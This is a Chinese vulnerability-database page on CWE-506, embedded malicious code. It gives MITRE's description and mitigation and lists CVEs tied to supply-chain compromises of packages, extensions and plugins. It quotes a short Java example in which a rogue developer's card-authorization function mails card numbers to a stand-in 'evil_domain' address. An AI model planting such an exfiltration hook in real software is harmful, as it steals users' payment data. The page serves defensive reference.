目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CWE-506 内嵌的恶意代码 类漏洞列表 82

CWE-506 内嵌的恶意代码 类弱点 82 条 CVE 漏洞汇总,含 AI 中文分析。

CWE-506指嵌入式恶意代码,属于软件内部植入的隐蔽后门或逻辑炸弹。攻击者通常利用开发者故意插入的代码,在特定条件触发时窃取数据或破坏系统,从而绕过正常安全机制。开发者应通过严格的代码审查、静态分析工具检测异常逻辑,并实施最小权限原则,确保代码来源可信且无未授权的后门植入,以从根本上杜绝此类内部威胁。

MITRE CWE 官方描述
CWE:CWE-506 嵌入式恶意代码(Embedded Malicious Code) 英文:该产品包含本质上看似恶意的代码。 恶意缺陷(Malicious flaws)拥有多种形象化的名称,包括特洛伊木马(Trojan horse)、陷阱门(trapdoor)、时间炸弹(timebomb)和逻辑炸弹(logic-bomb)。开发人员可能会插入恶意代码,意图在未来某个时刻颠覆产品或其宿主系统的安全性。它通常指执行有用服务,但以用户未预期的方式利用程序用户权限的程序。
常见影响 (1)
Confidentiality, Integrity, AvailabilityExecute Unauthorized Code or Commands
缓解措施 (1)
Implementation, OperationRemove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.
代码示例 (1)
In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.
boolean authorizeCard(String ccn) { // Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); }
Bad · Java
CVE ID标题CVSS风险等级Published
CVE-2026-48027 Nx Console 安全漏洞 — nx-console--2026-05-27
CVE-2026-8398 Disc Soft DAEMON Tools Lite 安全漏洞 — DAEMON Tools Lite 9.8 Critical2026-05-15
CVE-2026-44484 PyTorch Lightning 安全漏洞 — pytorch-lightning--2026-05-14
CVE-2026-45321 TanStack Query 安全漏洞 — arktype-adapter 9.6 Critical2026-05-12
CVE-2026-6443 WordPress plugin Accordion and Accordion Slider 安全漏洞 — Accordion and Accordion Slider 9.8 Critical2026-04-17
CVE-2026-34424 WordPress plugin Smart Slider 3 Pro 安全漏洞 — Smart Slider 3 Pro for WordPress 9.8 Critical2026-04-09
CVE-2026-33634 Aqua Security多款产品 安全漏洞 — setup-trivy 7.4 -2026-03-23
CVE-2026-31976 xygeni-action 安全漏洞 — xygeni-action 8.8AIHighAI2026-03-11
CVE-2026-28353 Trivy Action 安全漏洞 — trivy-vscode-extension 5.5 -2026-03-05
CVE-2024-10938 WordPress plugin OVRI Payment 安全漏洞 — OVRI Payment 6.5 Medium2026-02-27
CVE-2025-59374 ASUS Live Update 安全漏洞 — live update 8.1AIHighAI2025-12-17
CVE-2018-25117 Vesta Control Panel 安全漏洞 — Control Panel (CP) 8.8AIHighAI2025-10-15
CVE-2017-20203 NetSarang多款产品 安全漏洞 — Xmanager Enterprise 10.0AICriticalAI2025-10-09
CVE-2017-20202 Web Developer for Chrome 安全漏洞 — Web Developer for Chrome 8.8AIHighAI2025-10-08
CVE-2017-20201 CCleaner和CCleaner Cloud 安全漏洞 — CCleaner 9.8AICriticalAI2025-10-08
CVE-2025-10894 Nx 安全漏洞 9.6 Critical2025-09-24
CVE-2025-59145 color-name 安全漏洞 — color-name 6.1AIMediumAI2025-09-15
CVE-2025-59331 node-is-arrayish 安全漏洞 — node-is-arrayish 8.2AIHighAI2025-09-15
CVE-2025-59330 node-error-ex 安全漏洞 — node-error-ex 8.2AIHighAI2025-09-15
CVE-2025-59162 color-convert 安全漏洞 — color-convert 5.4AIMediumAI2025-09-15
CVE-2025-59142 Color-String 安全漏洞 — color-string 8.2AIHighAI2025-09-15
CVE-2025-59144 debug 安全漏洞 — debug 6.1AIMediumAI2025-09-15
CVE-2025-59143 color 安全漏洞 — color 6.1AIMediumAI2025-09-15
CVE-2025-59141 simple-swizzle 安全漏洞 — node-simple-swizzle 6.1AIMediumAI2025-09-15
CVE-2025-59140 Backslash 安全漏洞 — node-backslash 6.1AIMediumAI2025-09-15
CVE-2025-59039 Prebid Universal Creative 安全漏洞 — prebid-universal-creative 9.8AICriticalAI2025-09-09
CVE-2025-59038 Prebid.js 安全漏洞 — Prebid.js 8.2AIHighAI2025-09-09
CVE-2025-59037 DuckDB 安全漏洞 — duckdb-node 9.1AICriticalAI2025-09-09
CVE-2025-8217 Amazon Q Developer Visual Studio Code extension 安全漏洞 — Q Developer VS Code Extension 4.0 Medium2025-07-30
CVE-2025-54313 eslint-config-prettier 安全漏洞 — eslint-config-prettier 7.5 High2025-07-19

CWE-506(内嵌的恶意代码) 是常见的弱点类别,本平台收录该类弱点关联的 82 条 CVE 漏洞。